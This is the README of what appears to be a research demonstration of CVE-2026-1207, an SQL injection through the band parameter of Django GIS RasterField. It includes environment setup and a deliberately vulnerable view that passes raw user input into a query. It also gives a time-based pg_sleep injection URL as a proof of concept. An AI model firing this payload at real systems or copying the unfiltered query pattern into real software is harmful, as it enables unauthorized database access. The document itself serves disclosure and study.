Share
## https://sploitus.com/exploit?id=8BEE39A6-841F-5844-893C-47BC6DC07F18
# CVE-2026-1207: Django GIS RasterField SQL Injection Vulnerability Demonstration

## Vulnerability Overview

**Vulnerability Type**: SQL Injection
**Affected Component**: `django.contrib.gis`’s RasterField

When using Django GIS’s `RasterField` for queries, the `band` parameter is directly concatenated into the SQL statement, resulting in an SQL injection vulnerability. Attackers can inject arbitrary SQL code by constructing malicious `band` parameter values.

## Project Structure

```
CVE-2026-1207/
β”œβ”€β”€ .devcontainer/     # VSCode DevContainer configuration
β”œβ”€β”€ .vscode/           # VSCode configuration files
β”œβ”€β”€ vuln/             # Vulnerability demonstration application
β”‚   β”œβ”€β”€ models.py     # Model containing the RasterField
β”‚   β”œβ”€β”€ views.py      # Vulnerability trigger point
β”‚   └── migrations/   # Database migration files
β”œβ”€β”€ web/              # Django project configuration
β”œβ”€β”€ manage.py
β”œβ”€β”€ README.md
```

## Environment Setup

This vulnerability demonstration uses VSCode’s devcontainer for building. 

### 1️⃣ Open the Project

Open the root directory of the existing project in VS Code (including the `.devcontainer` folder).

### 2️⃣ Reopen the Container (Build Dev Container)

Press `Ctrl+Shift+P` (Windows/Linux) or `Cmd+Shift+P` (Mac).

Enter `Remote-Containers: Reopen in Container`.

VS Code will read the `.devcontainer` configuration and build the container (it may take a few minutes for the first build).

⚠️ If the Dockerfile or dependencies have been updated, you can choose `Remote-Containers: Rebuild Container` to ensure you’re using the latest environment.

### 3️⃣ Run the Django Development Server

Open the command panel (`Ctrl+Shift+P`).

Enter `Tasks: Run Task`.

Select `django:start` (the task is already configured in `.vscode/tasks.json`).

This task will start the Django development server within the container.

The server listens on `0.0.0.0:8087` by default.

### 4️⃣ Access the Project via Browser

Visit the project using a browser:

```
http://localhost:8087
```

### 5️⃣ Notes

The first run may require running database migrations:

```bash
python manage.py migrate
```

## Vulnerability Demonstration
Details of the vulnerability analysis can be found at [https://xz.aliyun.com/news/91993](https://xz.aliyun.com/news/91993).

For more information, visit our WeChat public account: [https://mp.weixin.qq.com/s/p7EZRKZBp-mRGhYqyc8i3A](https://xz.aliyun.com/news/91993)

### POC: Delayed Injection

Visit the following URLs to trigger SQL injection:

```
http://localhost:8087/book/search?band=1);select%20%271%27||pg_sleep(3)--
```

Observe the response time; a normal request should return immediately, while an injected request will be delayed by about 3 seconds.

### Location of the Vulnerability Code

[vuln/views.py:36](vuln/views.py#L36)

```python
def get(self, request: HttpRequest):
    band = request.GET.get("band", 1)  # Unfiltered user input
    rast = GDALRaster(...)
    qs = RasterModel.objects.filter(rast__contains=(rast, band))  # Band is directly used in the query
    print(qs.query)  # Generated SQL is displayed
    qs.count()
    return HttpResponse("book app")
```

### Generated SQL after Injection

```
SELECT ... FROM vuln_rastermodel
WHERE ST_Contains("vuln_rastermodel"."rast", ST_ContainsParam(..., 1));SELECT '1'||pg_sleep(3) --))
```

## Disclaimer

This project is intended for security research and educational purposes only. Do not use it on unauthorized systems.